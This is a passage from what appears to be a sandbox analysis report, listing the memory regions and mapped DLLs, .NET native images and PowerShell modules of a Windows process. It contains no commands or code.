id = 2420 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2421 start_va = 0x7fffb4400000 end_va = 0x7fffb4409fff monitored = 0 entry_point = 0x7fffb4401390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2422 start_va = 0x7fffa7500000 end_va = 0x7fffa7fc6fff monitored = 1 entry_point = 0x7fffa75063c0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 2423 start_va = 0x7fffbb230000 end_va = 0x7fffbb245fff monitored = 0 entry_point = 0x7fffbb23c000 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 2424 start_va = 0x7fffabdd0000 end_va = 0x7fffabe8cfff monitored = 0 entry_point = 0x7fffabe57db0 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 2425 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2426 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2427 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2428 start_va = 0x7fff47e90000 end_va = 0x7fff47e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47e90000" filename = "" Region: id = 2430 start_va = 0x7fff47ea0000 end_va = 0x7fff47eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47ea0000" filename = "" Region: id = 2431 start_va = 0x7fff47eb0000 end_va = 0x7fff47f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47eb0000" filename = "" Region: id = 2432 start_va = 0x7fff47f40000 end_va = 0x7fff47faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47f40000" filename = "" Region: id = 2433 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2434 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2435 start_va = 0x1ef0000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 2436 start_va = 0x1ef0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 2437 start_va = 0x2070000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 2438 start_va = 0x1e30000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 2439 start_va = 0x1ee0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 2440 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2441 start_va = 0x2080000 end_va = 0x1a07ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 2442 start_va = 0x1ef0000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 2443 start_va = 0x1fb0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 2444 start_va = 0x1a080000 end_va = 0x1a18cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a080000" filename = "" Region: id = 2445 start_va = 0x1fc0000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 2446 start_va = 0x1a190000 end_va = 0x1a4c7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2447 start_va = 0x7fffa5f00000 end_va = 0x7fffa74fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\de013c985ad100d05dc94ec118f77b92\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\de013c985ad100d05dc94ec118f77b92\\mscorlib.ni.dll") Region: id = 2448 start_va = 0x7ff4fddf0000 end_va = 0x7ff4fde8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fddf0000" filename = "" Region: id = 2449 start_va = 0x7ff4fdde0000 end_va = 0x7ff4fddeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdde0000" filename = "" Region: id = 2450 start_va = 0x7fff47fb0000 end_va = 0x7fff4802ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47fb0000" filename = "" Region: id = 2451 start_va = 0x1a4d0000 end_va = 0x1a614fff monitored = 0 entry_point = 0x1a52a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2452 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2453 start_va = 0x1a4d0000 end_va = 0x1a5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a4d0000" filename = "" Region: id = 2454 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2455 start_va = 0x7fff48030000 end_va = 0x7fff4803ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48030000" filename = "" Region: id = 2456 start_va = 0x7fffa5280000 end_va = 0x7fffa5ef0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\808887ebadf1a37835b907c866cede3c\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\808887ebadf1a37835b907c866cede3c\\system.ni.dll") Region: id = 2457 start_va = 0x7fffa4800000 end_va = 0x7fffa5274fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\bd42a6d2da6a5a79a9f5db3fa08a5283\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\bd42a6d2da6a5a79a9f5db3fa08a5283\\system.core.ni.dll") Region: id = 2458 start_va = 0x7fffa31f0000 end_va = 0x7fffa3298fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\bbaafa5e9b08bf0595cf4aeb6817258d\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pb378ec07#\\bbaafa5e9b08bf0595cf4aeb6817258d\\microsoft.powershell.consolehost.ni.dll") Region: id = 2460 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2461 start_va = 0x7fffc9230000 end_va = 0x7fffc9263fff monitored = 0 entry_point = 0x7fffc9236e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2462 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2463 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2464 start_va = 0x7fffa1180000 end_va = 0x7fffa31e5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\c8022b1ef74ee53741e939d60ba9b34e\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.manaa57fc8cc#\\c8022b1ef74ee53741e939d60ba9b34e\\system.management.automation.ni.dll") Region: id = 2465 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 2466 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2467 start_va = 0x1a600000 end_va = 0x1a744fff monitored = 0 entry_point = 0x1a65a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2468 start_va = 0x1a4d0000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a4d0000" filename = "" Region: id = 2469 start_va = 0x1a550000 end_va = 0x1a5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 2470 start_va = 0x1a5f0000 end_va = 0x1a5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5f0000" filename = "" Region: id = 2471 start_va = 0x1a600000 end_va = 0x1a67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a600000" filename = "" Region: id = 2472 start_va = 0x7c0000 end_va = 0x806fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 2473 start_va = 0x1f60000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 2474 start_va = 0x1a680000 end_va = 0x1a6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a680000" filename = "" Region: id = 2475 start_va = 0x1eb0000 end_va = 0x1eb4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 2476 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 2477 start_va = 0x7fffcb340000 end_va = 0x7fffcb347fff monitored = 0 entry_point = 0x7fffcb341110 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 2478 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2479 start_va = 0x7fffc8320000 end_va = 0x7fffc8aa9fff monitored = 0 entry_point = 0x7fffc84dc050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2480 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 2481 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2482 start_va = 0x1ed0000 end_va = 0x1ed0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2483 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2484 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2485 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2486 start_va = 0x1fa0000 end_va = 0x1fa7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 2487 start_va = 0x1a700000 end_va = 0x1a77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a700000" filename = "" Region: id = 2488 start_va = 0x1a780000 end_va = 0x1a7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a780000" filename = "" Region: id = 2489 start_va = 0x1a800000 end_va = 0x1a8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a800000" filename = "" Region: id = 2490 start_va = 0x7fff48040000 end_va = 0x7fff4804ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48040000" filename = "" Region: id = 2491 start_va = 0x1a900000 end_va = 0x1a961fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll") Region: id = 2492 start_va = 0x1a970000 end_va = 0x1a9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a970000" filename = "" Region: id = 2493 start_va = 0x7fffc8ac0000 end_va = 0x7fffc8ae2fff monitored = 0 entry_point = 0x7fffc8ac3700 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2494 start_va = 0x1fa0000 end_va = 0x1fa9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 2495 start_va = 0x2040000 end_va = 0x2047fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 2496 start_va = 0x2040000 end_va = 0x2061fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-package0213~31bf3856ad364e35~amd64~~10.0.19041.117.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.117.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-package0213~31bf3856ad364e35~amd64~~10.0.19041.117.cat") Region: id = 2497 start_va = 0x7fffb4460000 end_va = 0x7fffb4476fff monitored = 0 entry_point = 0x7fffb44681c0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 2498 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2499 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2500 start_va = 0x7fffb4410000 end_va = 0x7fffb4453fff monitored = 0 entry_point = 0x7fffb442f4d0 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 2501 start_va = 0x7fffa7ff0000 end_va = 0x7fffa808ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\f8f2f5ae61333087d91e84e98442197c\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.mf49f6405#\\f8f2f5ae61333087d91e84e98442197c\\microsoft.management.infrastructure.ni.dll") Region: id = 2502 start_va = 0x1a5d0000 end_va = 0x1a5d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "__psscriptpolicytest_tvqu22qz.0aq.ps1" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tvqu22qz.0aq.ps1" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\temp\\__psscriptpolicytest_tvqu22qz.0aq.ps1") Region: id = 2503 start_va = 0x7fffbb530000 end_va = 0x7fffbb53bfff monitored = 0 entry_point = 0x7fffbb5337c0 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll") Region: id = 2504 start_va = 0x7fffcb9d0000 end_va = 0x7fffcba48fff monitored = 0 entry_point = 0x7fffcb9f28f0 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 2505 start_va = 0x1a9f0000 end_va = 0x1b9effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a9f0000" filename = "" Region: id = 2506 start_va = 0x1a5e0000 end_va = 0x1a5e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "__psscriptpolicytest_tvqu22qz.0aq.ps1" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tvqu22qz.0aq.ps1" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\temp\\__psscriptpolicytest_tvqu22qz.0aq.ps1") Region: id = 2507 start_va = 0x7fffab800000 end_va = 0x7fffab81dfff monitored = 0 entry_point = 0x7fffab801ba0 region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll") Region: id = 2508 start_va = 0x7fffa90d0000 end_va = 0x7fffa9117fff monitored = 0 entry_point = 0x7fffa90d2c80 region_type = mapped_file name = "appxsip.dll" filename = "\\Windows\\System32\\AppxSip.dll" (normalized: "c:\\windows\\system32\\appxsip.dll") Region: id = 2509 start_va = 0x7fffa0f60000 end_va = 0x7fffa117afff monitored = 0 entry_point = 0x7fffa0fc1450 region_type = mapped_file name = "opcservices.dll" filename = "\\Windows\\System32\\OpcServices.dll" (normalized: "c:\\windows\\system32\\opcservices.dll") Region: id = 2510 start_va = 0x7fffc15c0000 end_va = 0x7fffc17acfff monitored = 0 entry_point = 0x7fffc163ea20 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 2511 start_va = 0x7fffc5ea0000 end_va = 0x7fffc5ed5fff monitored = 0 entry_point = 0x7fffc5eaf5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2512 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2513 start_va = 0x1a9f0000 end_va = 0x1aaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9f0000" filename = "" Region: id = 2514 start_va = 0x7fffa4460000 end_va = 0x7fffa45c5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\5e0d65edc2896cdb05874abda7e36dca\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.management\\5e0d65edc2896cdb05874abda7e36dca\\system.management.ni.dll") Region: id = 2515 start_va = 0x7fffb5850000 end_va = 0x7fffb585bfff monitored = 0 entry_point = 0x7fffb5855030 region_type = mapped_file name = "pwrshsip.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\pwrshsip.dll") Region: id = 2516 start_va = 0x1f60000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 2517 start_va = 0x7fffa0df0000 end_va = 0x7fffa0f55fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\f87e7f9015ee7fb19ce758d568e10549\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.dired13b18a9#\\f87e7f9015ee7fb19ce758d568e10549\\system.directoryservices.ni.dll") Region: id = 2518 start_va = 0x7fffa35d0000 end_va = 0x7fffa3e7afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\238862161c05eb67325815002be6719c\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\238862161c05eb67325815002be6719c\\system.xml.ni.dll") Region: id = 2519 start_va = 0x7fffa0d90000 end_va = 0x7fffa0de0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\4240c1c46430939704b0dd1780ab6e9f\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.numerics\\4240c1c46430939704b0dd1780ab6e9f\\system.numerics.ni.dll") Region: id = 2520 start_va = 0x7fffa0420000 end_va = 0x7fffa0d8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\0bbc6f96945d8cdf3e6f0cc46caeac0b\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.data\\0bbc6f96945d8cdf3e6f0cc46caeac0b\\system.data.ni.dll") Region: id = 2521 start_va = 0x7fffa00b0000 end_va = 0x7fffa0418fff monitored = 1 entry_point = 0x7fffa01fa3de region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 2522 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2523 start_va = 0x1aaf0000 end_va = 0x1ae50fff monitored = 1 entry_point = 0x1ac3a3de region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 2524 start_va = 0x7fff48050000 end_va = 0x7fff4805ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48050000" filename = "" Region: id = 2525 start_va = 0x1aaf0000 end_va = 0x1ab2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aaf0000" filename = "" Region: id = 2526 start_va = 0x7fffa83a0000 end_va = 0x7fffa84d2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\9e05584a25afa1da195dc4959a902595\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\9e05584a25afa1da195dc4959a902595\\system.configuration.ni.dll") Region: id = 2527 start_va = 0x1f70000 end_va = 0x1f76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 2528 start_va = 0x7fff48060000 end_va = 0x7fff4806ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48060000" filename = "" Region: id = 2531 start_va = 0x1f80000 end_va = 0x1f82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2532 start_va = 0x1f90000 end_va = 0x1f9afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2533 start_va = 0x1f80000 end_va = 0x1f82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2534 start_va = 0x1f90000 end_va = 0x1f9afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2535 start_va = 0x1f80000 end_va = 0x1f80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2536 start_va = 0x1f80000 end_va = 0x1f8afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2537 start_va = 0x1f80000 end_va = 0x1f80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2538 start_va = 0x1f80000 end_va = 0x1f8afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2539 start_va = 0x1f80000 end_va = 0x1f80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2540 start_va = 0x1f80000 end_va = 0x1f8afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = 